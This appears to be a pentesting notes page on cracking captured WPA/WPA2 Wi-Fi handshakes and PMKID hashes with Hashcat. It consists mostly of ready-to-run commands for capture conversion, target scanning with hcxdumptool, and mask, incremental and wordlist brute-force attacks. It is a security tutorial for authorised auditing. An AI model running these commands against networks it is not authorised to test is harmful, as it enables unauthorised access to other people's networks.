Hashcat Cracking
Overview
Cracking Wi-Fi passwords using Hashcat is a technique employed to recover the original password from a captured Wi-Fi handshake or PMKID hash. Hashcat is a powerful password recovery tool that utilizes the computational power of GPUs or CPUs to perform brute-force, dictionary, or mask-based attacks. By leveraging various attack modes and wordlists, Hashcat attempts to find the correct password by hashing and comparing it to the captured hash. This process can be time-consuming and resource-intensive, depending on the complexity of the password and the available computing power. It is important to note that cracking Wi-Fi passwords without proper authorization is illegal and unethical.
you can find here the official documentation of Hashcat (and how to use it):
Cracking WPA WIFI Handshake
converting the cap file
converting the cap captured file into a hccapx file
sudo /usr/share/hashcat-utils/cap2hccapx.bin captured_file.cap wpa2.hccapx
converting the cap captured file into a hc22000 file
hcxpcapngtool -o wpa2.hc22000 captured_file.cap
Cracking the hc22000 file using Hascat
Check GPU :
hashcat -I
Cracking 8 digits WPA WIFI Password
hashcat -m 2500 -a 3 wpa2.hccapx ?d?d?d?d?d?d?d?d
Increment from 8 to 20 digits WPA2 WIFI Password
hashcat -m 2500 -a 3 wpa2.hccapx --increment --increment-min 8 --increment-max 20 ?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d
Cracking 8 digits WPA WIFI Password (hc22000 method)
hashcat -m 22000 wpa2.hc22000 -a 3 ?d?d?d?d?d?d?d?d
Cracking 10 digits WPA WIFI Password (hc22000 method)
hashcat -m 22000 wpa2.hc22000 -a 3 ?d?d?d?d?d?d?d?d?d?d
Cracking 10 digits and alphabetic (Lowercase and uppercase) WPA WIFI Password (hc22000 method)
hashcat -m 22000 wpa2.hc22000 -1 ?d?l?u -a 3 ?1?1?1?1?1?1?1?1?1?1
Increment from 8 to 18 digits WPA2 WIFI Password (hc22000 method)
hashcat -m 22000 wpa2.hc22000 -a 3 --increment --increment-min 8 --increment-max 18 ?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d
Increment from 8 to 12 digits and alphabetic (Lowercase and uppercase) WPA2 WIFI Password (hc22000 method)
hashcat -m 22000 wpa2.hc22000 -1 ?d?l?u -a 3 --increment --increment-min 8 --increment-max 12 ?1?1?1?1?1?1?1?1?1?1?1?1
Cracking PMKID
converting the pcapng captured file into a hc22000 file
hcxpcapngtool -o hash.hc22000 -E essidlist dumpfile.pcapng
finding the mac address of the target WIFI
first, Stop all services accessing the WIFI Network
sudo systemctl stop NetworkManager.service
sudo systemctl stop wpa_supplicant.service
second, scaning
sudo hcxdumptool --do_rcascan -i [interface]
finally, you can copy the mac address in any file and complete the steps
Cracking the hc22000 file using Hascat
cracking the WIFI using a wordlist
hashcat -m 22000 hash.hc22000 wordlist.txt
brute forcing an 8 digit password WIFI Password
hashcat.exe -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?d
brute forcing an 8 to 18 digit password WIFI Password
hashcat.exe -m 22000 hash.hc22000 -a 3 --increment --increment-min 8 --increment-max 18 ?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d
Using GPU Cloud
You can watch This YouTube Video created by David Bombal to learn more about Cracking WIFI using GPU Cloud : how to setup an cloud and how to run the attack
Other YouTube Tutorials
You can check those YouTube Videos/Tutorials about Hashcat Cracking
This YouTube Video (PMKID Cracking) created by David Bombal
This YouTube Video (Brute Force WPA2) created by David Bombal
This YouTube Video (Brute forcing using powerful GPU) created by David Bombal
This YouTube Video (Cracking using GPU Cloud) created by David Bombal
For more details about Password Attacking and Hashcat , Check this Chapter:
Password AttacksHashcatLast updated